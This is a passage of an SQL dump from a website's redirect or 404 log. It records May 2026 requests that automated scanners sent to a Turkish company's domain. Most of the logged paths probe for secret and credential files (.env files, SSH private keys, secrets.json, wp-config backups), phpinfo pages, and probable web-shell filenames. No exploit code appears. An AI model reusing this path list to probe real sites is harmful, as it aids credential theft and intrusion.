00:00:00',301),(64656,'https://3s-technologies.com.tr/tr/.next/build-manifest.json',NULL,'https://3s-technologies.com.tr/.next/build-manifest.json','',2,0,'2026-05-10 05:33:24','0000-00-00 00:00:00',301),(64657,'https://3s-technologies.com.tr/tr/build/manifest.json',NULL,'https://3s-technologies.com.tr/build/manifest.json','',3,0,'2026-05-10 05:33:25','0000-00-00 00:00:00',301),(64658,'https://3s-technologies.com.tr/tr/.vite/manifest.json',NULL,'https://3s-technologies.com.tr/.vite/manifest.json','',3,0,'2026-05-10 05:33:27','0000-00-00 00:00:00',301),(64659,'https://3s-technologies.com.tr/tr/dist/manifest.json',NULL,'https://3s-technologies.com.tr/dist/manifest.json','',2,0,'2026-05-10 05:33:28','0000-00-00 00:00:00',301),(64660,'https://3s-technologies.com.tr/tr/dist/.vite/manifest.json',NULL,'https://3s-technologies.com.tr/dist/.vite/manifest.json','',2,0,'2026-05-10 05:33:30','0000-00-00 00:00:00',301),(64661,'https://3s-technologies.com.tr/tr/_nuxt/manifest.json',NULL,'https://3s-technologies.com.tr/_nuxt/manifest.json','',2,0,'2026-05-10 05:33:31','0000-00-00 00:00:00',301),(64662,'https://3s-technologies.com.tr/tr/_nuxt/builds/latest.json',NULL,'https://3s-technologies.com.tr/_nuxt/builds/latest.json','',2,0,'2026-05-10 05:33:33','0000-00-00 00:00:00',301),(64663,'https://3s-technologies.com.tr/tr/.astro/manifest.json',NULL,'https://3s-technologies.com.tr/.astro/manifest.json','',2,0,'2026-05-10 05:33:35','0000-00-00 00:00:00',301),(64664,'https://3s-technologies.com.tr/tr/static/manifest.json',NULL,'https://3s-technologies.com.tr/static/manifest.json','',2,0,'2026-05-10 05:33:37','0000-00-00 00:00:00',301),(64665,'https://3s-technologies.com.tr/tr/assets/manifest.json',NULL,'https://3s-technologies.com.tr/assets/manifest.json','',2,0,'2026-05-10 05:33:38','0000-00-00 00:00:00',301),(64666,'https://3s-technologies.com.tr/tr/stats.json',NULL,'https://3s-technologies.com.tr/stats.json','',2,0,'2026-05-10 05:33:41','0000-00-00 00:00:00',301),(64667,'https://3s-technologies.com.tr/tr/webpack-stats.json',NULL,'https://3s-technologies.com.tr/webpack-stats.json','',3,0,'2026-05-10 05:33:42','0000-00-00 00:00:00',301),(64668,'https://3s-technologies.com.tr/en/.pypirc',NULL,'https://3s-technologies.com.tr/.pypirc','',1,0,'2026-05-10 05:33:51','0000-00-00 00:00:00',301),(64669,'https://3s-technologies.com.tr/en/settings.py',NULL,'https://3s-technologies.com.tr/settings.py','',1,0,'2026-05-10 05:33:51','0000-00-00 00:00:00',301),(64670,'https://3s-technologies.com.tr/en/.env.development',NULL,'https://3s-technologies.com.tr/.env.development','',3,0,'2026-05-10 05:33:52','0000-00-00 00:00:00',301),(64671,'https://3s-technologies.com.tr/en/.ssh/id_dsa',NULL,'https://3s-technologies.com.tr/.ssh/id_dsa','',2,0,'2026-05-10 05:33:52','0000-00-00 00:00:00',301),(64672,'https://3s-technologies.com.tr/en/secrets.json',NULL,'https://3s-technologies.com.tr/secrets.json','',7,0,'2026-05-10 05:33:53','0000-00-00 00:00:00',301),(64673,'https://3s-technologies.com.tr/en/.ssh/id_ed25519',NULL,'https://3s-technologies.com.tr/.ssh/id_ed25519','',1,0,'2026-05-10 05:33:53','0000-00-00 00:00:00',301),(64674,'https://3s-technologies.com.tr/en/.npmrc',NULL,'https://3s-technologies.com.tr/.npmrc','',1,0,'2026-05-10 05:33:53','0000-00-00 00:00:00',301),(64675,'https://3s-technologies.com.tr/en/application.yml',NULL,'https://3s-technologies.com.tr/application.yml','',4,0,'2026-05-10 05:33:55','0000-00-00 00:00:00',301),(64676,'https://3s-technologies.com.tr/en/__/firebase/init.json',NULL,'https://3s-technologies.com.tr/__/firebase/init.json','',4,0,'2026-05-10 05:33:56','0000-00-00 00:00:00',301),(64677,'https://3s-technologies.com.tr/en/api/v1/env',NULL,'https://3s-technologies.com.tr/api/v1/env','',2,0,'2026-05-10 05:33:56','0000-00-00 00:00:00',301),(64678,'https://3s-technologies.com.tr/en/api/openapi.json',NULL,'https://3s-technologies.com.tr/api/openapi.json','',1,0,'2026-05-10 05:33:56','0000-00-00 00:00:00',301),(64679,'http://3s-technologies.com.tr/tr/insc.php',NULL,'http://3s-technologies.com.tr/insc.php','',6,0,'2026-05-10 08:33:38','0000-00-00 00:00:00',301),(64680,'http://3s-technologies.com.tr/tr/wp-content/themes/txets.php',NULL,'http://3s-technologies.com.tr/wp-content/themes/txets.php','',2,0,'2026-05-10 08:33:40','0000-00-00 00:00:00',301),(64681,'http://3s-technologies.com.tr/tr/.dela.php',NULL,'','',1,0,'2026-05-10 22:11:41','0000-00-00 00:00:00',301),(64682,'http://3s-technologies.com.tr/tr/like.php',NULL,'','',10,0,'2026-05-10 22:11:56','0000-00-00 00:00:00',301),(64683,'http://3s-technologies.com.tr/tr/mac.php',NULL,'','',11,0,'2026-05-11 05:46:12','0000-00-00 00:00:00',301),(64684,'http://3s-technologies.com.tr/tr/hayuk.php',NULL,'','',2,0,'2026-05-11 05:46:13','0000-00-00 00:00:00',301),(64685,'http://3s-technologies.com.tr/tr/casp3.php',NULL,'','',3,0,'2026-05-11 05:46:16','0000-00-00 00:00:00',301),(64686,'http://3s-technologies.com.tr/tr/birlingsless.php',NULL,'','',1,0,'2026-05-11 05:46:16','0000-00-00 00:00:00',301),(64687,'http://3s-technologies.com.tr/tr/unvouc.php',NULL,'','',2,0,'2026-05-11 05:46:17','0000-00-00 00:00:00',301),(64688,'http://3s-technologies.com.tr/tr/half.php',NULL,'','',5,0,'2026-05-11 05:46:22','0000-00-00 00:00:00',301),(64689,'http://3s-technologies.com.tr/tr/als.php',NULL,'','',5,0,'2026-05-11 05:48:00','0000-00-00 00:00:00',301),(64690,'http://3s-technologies.com.tr/tr/pol.php',NULL,'','',5,0,'2026-05-11 05:48:01','0000-00-00 00:00:00',301),(64691,'http://3s-technologies.com.tr/tr/ms-amdin.php',NULL,'','',3,0,'2026-05-11 05:48:01','0000-00-00 00:00:00',301),(64692,'http://3s-technologies.com.tr/tr/mini-type0.php',NULL,'','',1,0,'2026-05-11 05:48:02','0000-00-00 00:00:00',301),(64693,'http://3s-technologies.com.tr/tr/wp-optimaized.php',NULL,'','',1,0,'2026-05-11 05:48:03','0000-00-00 00:00:00',301),(64694,'http://3s-technologies.com.tr/tr/bypasbnget.php',NULL,'','',1,0,'2026-05-11 05:48:03','0000-00-00 00:00:00',301),(64695,'http://3s-technologies.com.tr/tr/sfm.php',NULL,'','',1,0,'2026-05-11 05:48:04','0000-00-00 00:00:00',301),(64696,'https://3s-technologies.com.tr/en/config/secrets.yml',NULL,'https://3s-technologies.com.tr/config/secrets.yml','',3,0,'2026-05-11 16:28:16','0000-00-00 00:00:00',301),(64697,'https://3s-technologies.com.tr/en/config/application.properties',NULL,'https://3s-technologies.com.tr/config/application.properties','',3,0,'2026-05-11 16:28:20','0000-00-00 00:00:00',301),(64698,'https://3s-technologies.com.tr/en/application.properties',NULL,'https://3s-technologies.com.tr/application.properties','',3,0,'2026-05-11 16:28:20','0000-00-00 00:00:00',301),(64699,'https://3s-technologies.com.tr/en/secrets.yml',NULL,'https://3s-technologies.com.tr/secrets.yml','',3,0,'2026-05-11 16:28:22','0000-00-00 00:00:00',301),(64700,'https://3s-technologies.com.tr/en/.env.test',NULL,'https://3s-technologies.com.tr/.env.test','',1,0,'2026-05-11 16:28:22','0000-00-00 00:00:00',301),(64701,'https://3s-technologies.com.tr/en/api/v2/settings',NULL,'https://3s-technologies.com.tr/api/v2/settings','',1,0,'2026-05-11 16:28:25','0000-00-00 00:00:00',301),(64702,'https://3s-technologies.com.tr/en/health',NULL,'https://3s-technologies.com.tr/health','',1,0,'2026-05-11 16:28:25','0000-00-00 00:00:00',301),(64703,'https://3s-technologies.com.tr/en/api/health',NULL,'https://3s-technologies.com.tr/api/health','',1,0,'2026-05-11 16:28:25','0000-00-00 00:00:00',301),(64704,'https://3s-technologies.com.tr/en/__env.js',NULL,'https://3s-technologies.com.tr/__env.js','',1,0,'2026-05-11 16:28:25','0000-00-00 00:00:00',301),(64705,'https://3s-technologies.com.tr/en/firebase-config.json',NULL,'https://3s-technologies.com.tr/firebase-config.json','',5,0,'2026-05-11 16:28:26','0000-00-00 00:00:00',301),(64706,'http://3s-technologies.com.tr/tr/index26.php',NULL,'','',1,0,'2026-05-11 18:47:06','0000-00-00 00:00:00',301),(64707,'http://3s-technologies.com.tr/tr/xynz1.php',NULL,'','',1,0,'2026-05-11 18:47:15','0000-00-00 00:00:00',301),(64708,'http://3s-technologies.com.tr/tr/uqcxit7i.php',NULL,'','',1,0,'2026-05-11 18:47:15','0000-00-00 00:00:00',301),(64709,'http://3s-technologies.com.tr/tr/display_info.php',NULL,'','',1,0,'2026-05-11 18:47:16','0000-00-00 00:00:00',301),(64710,'http://3s-technologies.com.tr/tr/wp-config-disabled.php',NULL,'','',1,0,'2026-05-11 18:47:17','0000-00-00 00:00:00',301),(64711,'http://3s-technologies.com.tr/tr/php-nginx.php',NULL,'','',1,0,'2026-05-11 18:47:20','0000-00-00 00:00:00',301),(64712,'http://3s-technologies.com.tr/tr/wp-config.test.php',NULL,'','',1,0,'2026-05-11 18:47:21','0000-00-00 00:00:00',301),(64713,'http://3s-technologies.com.tr/tr/mandrill.php',NULL,'','',1,0,'2026-05-11 18:47:22','0000-00-00 00:00:00',301),(64714,'http://3s-technologies.com.tr/tr/backup.wp-config.php',NULL,'','',1,0,'2026-05-11 18:47:23','0000-00-00 00:00:00',301),(64715,'http://3s-technologies.com.tr/tr/upload_file.php',NULL,'','',1,0,'2026-05-11 18:47:25','0000-00-00 00:00:00',301),(64716,'http://3s-technologies.com.tr/tr/aws.settings.php',NULL,'','',1,0,'2026-05-11 18:47:26','0000-00-00 00:00:00',301),(64717,'http://3s-technologies.com.tr/tr/pqr.php',NULL,'','',1,0,'2026-05-11 18:47:27','0000-00-00 00:00:00',301),(64718,'http://3s-technologies.com.tr/tr/extension-info.php',NULL,'','',1,0,'2026-05-11 18:47:52','0000-00-00 00:00:00',301),(64719,'http://3s-technologies.com.tr/tr/conn_test.php',NULL,'','',1,0,'2026-05-11 18:47:52','0000-00-00 00:00:00',301),(64720,'http://3s-technologies.com.tr/tr/information.php',NULL,'','',1,0,'2026-05-11 18:47:53','0000-00-00 00:00:00',301),(64721,'http://3s-technologies.com.tr/tr/credentials.php',NULL,'','',1,0,'2026-05-11 18:47:54','0000-00-00 00:00:00',301),(64722,'http://3s-technologies.com.tr/tr/phphph.php',NULL,'','',1,0,'2026-05-11 18:47:55','0000-00-00 00:00:00',301),(64723,'http://3s-technologies.com.tr/tr/test-cgi.php',NULL,'','',1,0,'2026-05-11 18:47:56','0000-00-00 00:00:00',301),(64724,'http://3s-technologies.com.tr/tr/twin.php',NULL,'','',1,0,'2026-05-11 18:47:56','0000-00-00 00:00:00',301),(64725,'http://3s-technologies.com.tr/tr/pi.php7',NULL,'','',1,0,'2026-05-11 18:47:58','0000-00-00 00:00:00',301),(64726,'http://3s-technologies.com.tr/tr/display_phpinfo.php',NULL,'','',1,0,'2026-05-11 18:47:58','0000-00-00 00:00:00',301),(64727,'http://3s-technologies.com.tr/tr/webserver-info.php',NULL,'','',1,0,'2026-05-11 18:47:59','0000-00-00 00:00:00',301),(64728,'http://3s-technologies.com.tr/tr/new-wp-config.php',NULL,'','',1,0,'2026-05-11 18:48:00','0000-00-00 00:00:00',301),(64729,'http://3s-technologies.com.tr/tr/env-info.php',NULL,'','',1,0,'2026-05-11 18:48:01','0000-00-00 00:00:00',301),(64730,'http://3s-technologies.com.tr/tr/moderator.php',NULL,'','',1,0,'2026-05-11 18:48:02','0000-00-00 00:00:00',301),(64731,'http://3s-technologies.com.tr/tr/globals.php',NULL,'','',1,0,'2026-05-11 18:48:05','0000-00-00 00:00:00',301),(64732,'http://3s-technologies.com.tr/en/images/images/cache.php',NULL,'www.google.com','',8,0,'2026-05-12 01:36:21','0000-00-00 00:00:00',301),(64733,'http://3s-technologies.com.tr/tr/hhf.php',NULL,'','',2,0,'2026-05-12 10:58:53','0000-00-00 00:00:00',301),(64734,'http://3s-technologies.com.tr/tr/amba5.php',NULL,'','',2,0,'2026-05-12 10:58:54','0000-00-00 00:00:00',301),(64735,'http://3s-technologies.com.tr/tr/cdx6.php',NULL,'','',1,0,'2026-05-12 10:59:05','0000-00-00 00:00:00',301),(64736,'http://3s-technologies.com.tr/tr/wper.php',NULL,'','',1,0,'2026-05-12 11:00:00','0000-00-00 00:00:00',301),(64737,'http://3s-technologies.com.tr/tr/a22.php',NULL,'','',1,0,'2026-05-12 11:00:07','0000-00-00 00:00:00',301),(64738,'http://3s-technologies.com.tr/tr/a80.php',NULL,'','',1,0,'2026-05-12 11:00:07','0000-00-00 00:00:00',301),(64739,'http://3s-technologies.com.tr/tr/a34.php',NULL,'','',1,0,'2026-05-12 11:00:08','0000-00-00 00:00:00',301),(64740,'http://3s-technologies.com.tr/tr/a24.php',NULL,'','',1,0,'2026-05-12 11:00:09','0000-00-00 00:00:00',301),(64741,'http://3s-technologies.com.tr/tr/a31.php',NULL,'','',2,0,'2026-05-12 11:00:10','0000-00-00 00:00:00',301),(64742,'http://3s-technologies.com.tr/tr/cx.php',NULL,'','',1,0,'2026-05-12 11:00:14','0000-00-00 00:00:00',301),(64743,'http://mail.3s-technologies.com.tr/tr/hhf.php',NULL,'','',1,0,'2026-05-12 11:54:29','0000-00-00 00:00:00',301),(64744,'http://mail.3s-technologies.com.tr/tr/amba5.php',NULL,'','',1,0,'2026-05-12 11:54:30','0000-00-00 00:00:00',301),(64745,'http://mail.3s-technologies.com.tr/tr/cdx6.php',NULL,'','',1,0,'2026-05-12 11:54:41','0000-00-00 00:00:00',301),(64746,'http://mail.3s-technologies.com.tr/tr/academy.php',NULL,'','',1,0,'2026-05-12 11:55:17','0000-00-00 00:00:00',301),(64747,'http://mail.3s-technologies.com.tr/tr/wper.php',NULL,'','',1,0,'2026-05-12 11:55:39','0000-00-00 00:00:00',301),(64748,'http://mail.3s-technologies.com.tr/tr/a22.php',NULL,'','',1,0,'2026-05-12 11:55:47','0000-00-00 00:00:00',301),(64749,'http://mail.3s-technologies.com.tr/tr/a80.php',NULL,'','',1,0,'2026-05-12 11:55:48','0000-00-00 00:00:00',301),(64750,'http://mail.3s-technologies.com.tr/tr/a34.php',NULL,'','',1,0,'2026-05-12 11:55:49','0000-00-00 00:00:00',301),(64751,'http://mail.3s-technologies.com.tr/tr/a24.php',NULL,'','',1,0,'2026-05-12 11:55:50','0000-00-00 00:00:00',301),(64752,'http://mail.3s-technologies.com.tr/tr/a31.php',NULL,'','',1,0,'2026-05-12 11:55:51','0000-00-00 00:00:00',301),(64753,'http://mail.3s-technologies.com.tr/tr/ax.php',NULL,'','',1,0,'2026-05-12 11:55:54','0000-00-00 00:00:00',301),(64754,'https://3s-technologies.com.tr/en/wp-admin/install.php',NULL,'https://3s-technologies.com.tr/wp-admin/install.php','',1,0,'2026-05-13 03:52:43','0000-00-00 00:00:00',301),(64755,'https://3s-technologies.com.tr/en/templates/beez5/css/layout.css.map',NULL,'https://3s-technologies.com.tr/templates/beez5/css/layout.css.map','',1,0,'2026-05-13 07:22:50','0000-00-00 00:00:00',301),(64756,'https://3s-technologies.com.tr/en/modules/mod_djimageslider/themes/default/css/djimageslider.css.map',NULL,'https://3s-technologies.com.tr/modules/mod_djimageslider/themes/default/css/djimageslider.css.map','',1,0,'2026-05-13 07:22:52','0000-00-00 00:00:00',301),(64757,'https://3s-technologies.com.tr/en/templates/beez5/css/ieonly.css.map',NULL,'https://3s-technologies.com.tr/templates/beez5/css/ieonly.css.map','',1,0,'2026-05-13 07:22:54','0000-00-00 00:00:00',301),(64758,'https://3s-technologies.com.tr/en/templates/beez5/css/beez5.css.map',NULL,'https://3s-technologies.com.tr/templates/beez5/css/beez5.css.map','',1,0,'2026-05-13 07:22:55','0000-00-00 00:00:00',301),(64759,'https://3s-technologies.com.tr/en/templates/beez5/css/general.css.map',NULL,'https://3s-technologies.com.tr/templates/beez5/css/general.css.map','',1,0,'2026-05-13 07:22:57','0000-00-00 00:00:00',301),(64760,'https://3s-technologies.com.tr/en/media/djextensions/jquery-easing/jquery.easing.min.js.map',NULL,'https://3s-technologies.com.tr/media/djextensions/jquery-easing/jquery.easing.min.js.map','',1,0,'2026-05-13 07:22:59','0000-00-00 00:00:00',301),(64761,'https://3s-technologies.com.tr/en/templates/beez5/javascript/md_stylechanger.js.map',NULL,'https://3s-technologies.com.tr/templates/beez5/javascript/md_stylechanger.js.map','',1,0,'2026-05-13 07:23:00','0000-00-00 00:00:00',301),(64762,'https://3s-technologies.com.tr/en/templates/system/css/system.css.map',NULL,'https://3s-technologies.com.tr/templates/system/css/system.css.map','',1,0,'2026-05-13 07:23:01','0000-00-00 00:00:00',301),(64763,'https://3s-technologies.com.tr/en/templates/beez5/css/position.css.map',NULL,'https://3s-technologies.com.tr/templates/beez5/css/position.css.map','',1,0,'2026-05-13 07:23:03','0000-00-00 00:00:00',301),(64764,'https://3s-technologies.com.tr/en/templates/beez5/css/print.css.map',NULL,'https://3s-technologies.com.tr/templates/beez5/css/print.css.map','',1,0,'2026-05-13 07:23:04','0000-00-00 00:00:00',301),(64765,'https://3s-technologies.com.tr/en/templates/beez5/css/ie7only.css.map',NULL,'https://3s-technologies.com.tr/templates/beez5/css/ie7only.css.map','',1,0,'2026-05-13 07:23:06','0000-00-00 00:00:00',301),(64766,'https://3s-technologies.com.tr/en/templates/beez5/javascript/hide.js.map',NULL,'https://3s-technologies.com.tr/templates/beez5/javascript/hide.js.map','',1,0,'2026-05-13 07:23:07','0000-00-00 00:00:00',301),(64767,'http://mail.3s-technologies.com.tr/tr/wp_filemanager.php?p=',NULL,'','',1,0,'2026-05-14 05:21:51','0000-00-00 00:00:00',301),(64768,'http://mail.3s-technologies.com.tr/tr/index26.php',NULL,'','',1,0,'2026-05-14 05:21:53','0000-00-00 00:00:00',301),(64769,'http://mail.3s-technologies.com.tr/tr/xynz1.php',NULL,'','',1,0,'2026-05-14 05:21:59','0000-00-00 00:00:00',301),(64770,'http://mail.3s-technologies.com.tr/tr/uqcxit7i.php',NULL,'','',1,0,'2026-05-14 05:22:00','0000-00-00 00:00:00',301),(64771,'http://mail.3s-technologies.com.tr/tr/display_info.php',NULL,'','',1,0,'2026-05-14 05:22:00','0000-00-00 00:00:00',301),(64772,'http://mail.3s-technologies.com.tr/tr/wp-config-disabled.php',NULL,'','',1,0,'2026-05-14 05:22:01','0000-00-00 00:00:00',301),(64773,'http://mail.3s-technologies.com.tr/tr/test_info.php',NULL,'','',1,0,'2026-05-14 05:22:02','0000-00-00 00:00:00',301),(64774,'http://mail.3s-technologies.com.tr/tr/wp-index.php',NULL,'','',1,0,'2026-05-14 05:22:03','0000-00-00 00:00:00',301),(64775,'http://mail.3s-technologies.com.tr/tr/php-nginx.php',NULL,'','',1,0,'2026-05-14 05:22:04','0000-00-00 00:00:00',301),(64776,'http://mail.3s-technologies.com.tr/tr/wp-config.test.php',NULL,'','',1,0,'2026-05-14 05:22:04','0000-00-00 00:00:00',301),(64777,'http://mail.3s-technologies.com.tr/tr/mandrill.php',NULL,'','',1,0,'2026-05-14 05:22:06','0000-00-00 00:00:00',301),(64778,'http://mail.3s-technologies.com.tr/tr/backup.wp-config.php',NULL,'','',1,0,'2026-05-14 05:22:07','0000-00-00 00:00:00',301),(64779,'http://mail.3s-technologies.com.tr/tr/aws.settings.php',NULL,'','',1,0,'2026-05-14 05:22:09','0000-00-00 00:00:00',301),(64780,'http://mail.3s-technologies.com.tr/tr/payout.php',NULL,'','',1,0,'2026-05-14 05:22:10','0000-00-00 00:00:00',301),(64781,'http://mail.3s-technologies.com.tr/tr/pqr.php',NULL,'','',1,0,'2026-05-14 05:22:11','0000-00-00 00:00:00',301),(64782,'http://mail.3s-technologies.com.tr/tr/456.php',NULL,'','',1,0,'2026-05-14 05:22:13','0000-00-00 00:00:00',301),(64783,'http://mail.3s-technologies.com.tr/tr/extension-info.php',NULL,'','',1,0,'2026-05-14 05:22:15','0000-00-00 00:00:00',301),(64784,'http://mail.3s-technologies.com.tr/tr/conn_test.php',NULL,'','',1,0,'2026-05-14 05:22:16','0000-00-00 00:00:00',301),(64785,'http://mail.3s-technologies.com.tr/tr/information.php',NULL,'','',1,0,'2026-05-14 05:22:16','0000-00-00 00:00:00',301),(64786,'http://mail.3s-technologies.com.tr/tr/credentials.php',NULL,'','',1,0,'2026-05-14 05:22:17','0000-00-00 00:00:00',301),(64787,'http://mail.3s-technologies.com.tr/tr/phphph.php',NULL,'','',1,0,'2026-05-14 05:22:18','0000-00-00 00:00:00',301),(64788,'http://mail.3s-technologies.com.tr/tr/test-cgi.php',NULL,'','',1,0,'2026-05-14 05:22:18','0000-00-00 00:00:00',301),(64789,'http://mail.3s-technologies.com.tr/tr/twin.php',NULL,'','',1,0,'2026-05-14 05:22:19','0000-00-00 00:00:00',301),(64790,'http://mail.3s-technologies.com.tr/tr/pi.php7',NULL,'','',1,0,'2026-05-14 05:22:20','0000-00-00 00:00:00',301),(64791,'http://mail.3s-technologies.com.tr/tr/display_phpinfo.php',NULL,'','',1,0,'2026-05-14 05:22:20','0000-00-00 00:00:00',301),(64792,'http://mail.3s-technologies.com.tr/tr/webserver-info.php',NULL,'','',1,0,'2026-05-14 05:22:21','0000-00-00 00:00:00',301),(64793,'http://mail.3s-technologies.com.tr/tr/new-wp-config.php',NULL,'','',1,0,'2026-05-14 05:22:22','0000-00-00 00:00:00',301),(64794,'http://mail.3s-technologies.com.tr/tr/env-info.php',NULL,'','',1,0,'2026-05-14 05:22:22','0000-00-00 00:00:00',301),(64795,'http://mail.3s-technologies.com.tr/tr/moderator.php',NULL,'','',1,0,'2026-05-14 05:22:23','0000-00-00 00:00:00',301),(64796,'http://mail.3s-technologies.com.tr/tr/summary.php',NULL,'','',1,0,'2026-05-14 05:22:25','0000-00-00 00:00:00',301),(64797,'http://mail.3s-technologies.com.tr/tr/globals.php',NULL,'','',1,0,'2026-05-14 05:22:25','0000-00-00 00:00:00',301),(64798,'http://mail.3s-technologies.com.tr/tr/evil.php',NULL,'','',1,0,'2026-05-14 05:22:26','0000-00-00 00:00:00',301),(64799,'http://3s-technologies.com.tr/tr/file60.php',NULL,'','',3,0,'2026-05-14 08:27:37','0000-00-00 00:00:00',301),(64800,'http://3s-technologies.com.tr/tr/xstelth.php',NULL,'','',5,0,'2026-05-14 08:29:10','0000-00-00 00:00:00',301),(64801,'http://mail.3s-technologies.com.tr/tr/file60.php',NULL,'','',2,0,'2026-05-14 08:58:36','0000-00-00 00:00:00',301),(64802,'http://mail.3s-technologies.com.tr/tr/xstelth.php',NULL,'','',4,0,'2026-05-14 09:00:06','0000-00-00 00:00:00',301),(64803,'http://mail.3s-technologies.com.tr/tr/min.php',NULL,'','',3,0,'2026-05-14 09:00:07','0000-00-00 00:00:00',301),(64804,'http://3s-technologies.com.tr/en/hxtrgfkn',NULL,'','',3,0,'2026-05-15 00:47:37','0000-00-00 00:00:00',301),(64805,'https://3s-technologies.com.tr/en/czasklfe',NULL,'','',2,0,'2026-05-15 00:47:42','0000-00-00 00:00:00',301),(64806,'http://3s-technologies.com.tr/en/kejzbrnq',NULL,'','',3,0,'2026-05-15 00:47:55','0000-00-00 00:00:00',301),(64807,'https://3s-technologies.com.tr/en/gjnzdlha',NULL,'','',3,0,'2026-05-15 00:47:56','0000-00-00 00:00:00',301),(64808,'https://3s-technologies.com.tr/tr/.env_production',NULL,'','',1,0,'2026-05-15 06:33:19','0000-00-00 00:00:00',301),(64809,'https://3s-technologies.com.tr/tr/public_html/.env',NULL,'','',7,0,'2026-05-15 06:33:23','0000-00-00 00:00:00',301),(64810,'https://3s-technologies.com.tr/tr/.env.gz',NULL,'','',1,0,'2026-05-15 06:33:29','0000-00-00 00:00:00',301),(64811,'https://3s-technologies.com.tr/tr/.env.tar',NULL,'','',1,0,'2026-05-15 06:33:30','0000-00-00 00:00:00',301),(64812,'https://3s-technologies.com.tr/tr/html/.env',NULL,'','',7,0,'2026-05-15 06:33:35','0000-00-00 00:00:00',301),(64813,'https://3s-technologies.com.tr/tr/system/.env',NULL,'','',1,0,'2026-05-15 06:33:37','0000-00-00 00:00:00',301),(64814,'https://3s-technologies.com.tr/tr/users/.env',NULL,'','',1,0,'2026-05-15 06:33:42','0000-00-00 00:00:00',301),(64815,'https://3s-technologies.com.tr/tr/login/.env',NULL,'','',1,0,'2026-05-15 06:33:43','0000-00-00 00:00:00',301),(64816,'http://3s-technologies.com.tr/tr/zabbix.conf.php',NULL,'','',1,0,'2026-05-15 13:22:04','0000-00-00 00:00:00',301),(64817,'http://3s-technologies.com.tr/tr/verification.php',NULL,'','',1,0,'2026-05-15 13:22:09','0000-00-00 00:00:00',301),(64818,'http://3s-technologies.com.tr/tr/sysinfo.php',NULL,'','',1,0,'2026-05-15 13:22:14','0000-00-00 00:00:00',301),(64819,'http://3s-technologies.com.tr/tr/alfateslav4.php',NULL,'','',1,0,'2026-05-15 13:22:15','0000-00-00 00:00:00',301),(64820,'http://3s-technologies.com.tr/tr/broadcasting.php',NULL,'','',1,0,'2026-05-15 13:22:16','0000-00-00 00:00:00',301),(64821,'http://3s-technologies.com.tr/tr/info2.php',NULL,'','',2,0,'2026-05-15 13:22:17','0000-00-00 00:00:00',301),(64822,'http://3s-technologies.com.tr/tr/check-system.php',NULL,'','',1,0,'2026-05-15 13:22:18','0000-00-00 00:00:00',301),(64823,'http://3s-technologies.com.tr/tr/benchmark.php',NULL,'','',1,0,'2026-05-15 13:22:20','0000-00-00 00:00:00',301),(64824,'http://3s-technologies.com.tr/tr/findes.php',NULL,'','',1,0,'2026-05-15 13:22:21','0000-00-00 00:00:00',301),(64825,'http://3s-technologies.com.tr/tr/wp-config-test.php',NULL,'','',1,0,'2026-05-15 13:22:23','0000-00-00 00:00:00',301),(64826,'http://3s-technologies.com.tr/tr/vbseo.php',NULL,'','',1,0,'2026-05-15 13:22:24','0000-00-00 00:00:00',301),(64827,'http://3s-technologies.com.tr/tr/ppinfo.php',NULL,'','',1,0,'2026-05-15 13:22:25','0000-00-00 00:00:00',301),(64828,'http://3s-technologies.com.tr/tr/email.php',NULL,'','',1,0,'2026-05-15 13:22:28','0000-00-00 00:00:00',301),(64829,'http://3s-technologies.com.tr/tr/.qiodeme.php',NULL,'','',1,0,'2026-05-15 13:22:31','0000-00-00 00:00:00',301),(64830,'http://3s-technologies.com.tr/tr/spytaiqe.php',NULL,'','',1,0,'2026-05-15 13:22:32','0000-00-00 00:00:00',301),(64831,'http://3s-technologies.com.tr/tr/conn-test.php',NULL,'','',1,0,'2026-05-15 13:22:34','0000-00-00 00:00:00',301),(64832,'http://3s-technologies.com.tr/tr/wp_sitting.php',NULL,'','',1,0,'2026-05-15 13:22:35','0000-00-00 00:00:00',301),(64833,'http://3s-technologies.com.tr/tr/about-me.php',NULL,'','',2,0,'2026-05-15 13:22:38','0000-00-00 00:00:00',301),(64834,'http://3s-technologies.com.tr/tr/mailgun.php',NULL,'','',1,0,'2026-05-15 13:22:39','0000-00-00 00:00:00',301),(64835,'http://3s-technologies.com.tr/tr/pictureproxy.php',NULL,'','',1,0,'2026-05-15 13:22:41','0000-00-00 00:00:00',301),(64836,'http://3s-technologies.com.tr/tr/test_page.php',NULL,'','',1,0,'2026-05-15 13:22:42','0000-00-00 00:00:00',301),(64837,'http://3s-technologies.com.tr/tr/fresh.php',NULL,'','',1,0,'2026-05-15 13:22:44','0000-00-00 00:00:00',301),(64838,'http://3s-technologies.com.tr/tr/dbconn.php',NULL,'','',1,0,'2026-05-15 13:22:45','0000-00-00 00:00:00',301),(64839,'http://3s-technologies.com.tr/tr/infophp1.php',NULL,'','',1,0,'2026-05-15 13:22:46','0000-00-00 00:00:00',301),(64840,'http://3s-technologies.com.tr/tr/pong.php',NULL,'','',1,0,'2026-05-15 13:22:49','0000-00-00 00:00:00',301),(64841,'http://3s-technologies.com.tr/tr/test-environment.php',NULL,'','',1,0,'2026-05-15 13:22:50','0000-00-00 00:00:00',301),(64842,'http://3s-technologies.com.tr/tr/channel.php',NULL,'','',1,0,'2026-05-15 13:22:52','0000-00-00 00:00:00',301),(64843,'http://3s-technologies.com.tr/tr/show-config.php',NULL,'','',1,0,'2026-05-15 13:22:53','0000-00-00 00:00:00',301),(64844,'http://3s-technologies.com.tr/tr/ververify.php',NULL,'','',1,0,'2026-05-15 13:22:54','0000-00-00 00:00:00',301),(64845,'http://3s-technologies.com.tr/tr/acl.config.php',NULL,'','',1,0,'2026-05-15 13:22:55','0000-00-00 00:00:00',301),(64846,'http://3s-technologies.com.tr/tr/test-cgi.php5',NULL,'','',1,0,'2026-05-15 13:22:55','0000-00-00 00:00:00',301),(64847,'http://3s-technologies.com.tr/tr/site-phpinfo.php',NULL,'','',1,0,'2026-05-15 13:22:56','0000-00-00 00:00:00',301),(64848,'http://3s-technologies.com.tr/tr/phpinfo002.php',NULL,'','',1,0,'2026-05-15 13:22:57','0000-00-00 00:00:00',301),(64849,'http://3s-technologies.com.tr/tr/admin-phpinfo.php',NULL,'','',1,0,'2026-05-15 13:22:59','0000-00-00 00:00:00',301),(64850,'http://3s-technologies.com.tr/tr/php-modules.php',NULL,'','',1,0,'2026-05-15 13:23:00','0000-00-00 00:00:00',301),(64851,'http://3s-technologies.com.tr/tr/rwdzfzgn.php',NULL,'','',1,0,'2026-05-15 13:23:02','0000-00-00 00:00:00',301),(64852,'http://3s-technologies.com.tr/tr/rest.php',NULL,'','',1,0,'2026-05-15 13:23:03','0000-00-00 